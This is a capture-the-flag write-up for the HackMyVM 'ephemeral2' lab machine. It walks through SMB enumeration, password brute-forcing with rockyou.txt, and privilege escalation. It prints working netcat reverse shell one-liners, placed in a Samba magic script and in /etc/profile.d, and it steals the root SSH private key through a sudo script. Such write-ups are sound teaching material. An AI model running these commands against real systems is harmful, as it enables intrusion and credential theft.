The free CTF Challenge web site “hackmyvm.eu” have an other medium level vm called ‘ephemeral2‘ for us to download, enumerate and get some flags. In this write-up will try to describe my method and thought process on how I completed this hackmyvm ephemeral2 CTF challenge.
Table of Contents
- More Enumeration
Setup for hackmyvm ephemeral2
The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.10 – This is the ephemeral2 vm.
For enumeration of the hackmyvm ephemeral2 Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed.
The first command to run is nmap for network services enumeration.
There are only 4 ports open,
- 80, http,
- 22, ssh,
- 139 and 445, smb,
Using a web fuzzer with the website and I found nothing of interest. So lets dig deeper into the samba part. And use the below command to see if we can get any user information.
enum4linux -U 192.168.186.10
After a minute of it running we get a username,
Account: randy Name: randy
Now to get the share list
enum4linux -S 192.168.186.10
This results in a list of the directories shared by samba. There is only one of interest and its below.
Sharename Type Comment --------- ---- ---- SYSADMIN Disk
But this name and share is not enough to mount a remote file system (SYSADMIN). So I have to use smbrute to try and get the password. I used the rockyou.txt password and it took a long time, be prepared to wait. Also make sure you have smbclient installed before you run the smbrute script.
The script smbrute.py needs three things to run. A file with the usernames, a file with the passwords and a target. So use a file with one user name “randy” and the rockyou.txt password list on github. If rockyou.txt is too big you will have to break it up. Hint: The password is in the top 2000 of this file.
python3 ./smbrute.py -t 192.168.186.10 -u /tmp/users -p /opt/rockyou.txt
Eventually you will get the password. Just wait. And once you have the password you can mount up the share.
sudo mount -t cifs -o username=randy //192.168.186.10/SYSADMIN /mnt
Some interesting files, take a look at them. The one I am most interested is in the smb.conf file. And “randys” share configuration.
Look up what magic script does. It’s really interesting. So after you look that up take a look at creating a reverse shell script,
Put in the below contents.
#!/bin/bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 4444 >/tmp/f
Now in another window run on the enumeration system, open a netcat to capture the shell.
nc -vlnp 4444
And copy your reverse shell script into the mount. If you are not root be sure to use sudo.
sudo cp /tmp/rev.sh /mnt/smbscript.elf
And you should get a shell on the netcat Terminal window.
After some poking around you can find two things.
- /etc/profile.d is writable
- There is a job that runs ssh for the user ralph, in cron, every minute (see /etc/crontab).
Another Reverse Shell
So all scripts in /etc/profile.d are run when someone logs in. Therefore when the ssh script runs for the user “ralph” it can be used to spawn another reverse shell. So modify the reverse shell script we created earlier to look like the below.
#!/bin/bash rm /tmp/k;mkfifo /tmp/k;cat /tmp/k|sh -i 2>&1|nc 192.168.186.150 4445 >/tmp/k
And put it into “/etc/profile.d/shell.sh” on the host. Then in another window or the enumeration host, run another netcat.
nc -vlnp 4445
Now we have another shell, this time as the user “ralph”.
Stabilize the shell.
Take a look at sudo -l
This script does something interesting to the files input into it. Try to figure it out.
Netcat One More time
On yet another terminal on your enumeration host, run netcat again.
nc -vlnp 4446
Now run the sudo command
sudo /usr/bin/python3 /home/ralph/getfile.py
When “File Path” pops up, put in
File path: /root/.ssh/id_rsa
When IP comes up, put in the ip of your enumeration host and the port you ran netcat on.
IP address: 192.168.186.150:4446
And all going well, the root ssh private key will pop up on the netcat window.
Save it on the ephemeral system somewhere (I used /tmp/key.pem). Set the permissions to 600 and use the below to get onto the system as root.
vi /tmp/key.pem chmod 600 /tmp/key.pem ssh -i /tmp/key.pem root@localhost
I found this room challenging and engaging. Thanks to rpj7 for pointing out that running the same command more than once can yield different results.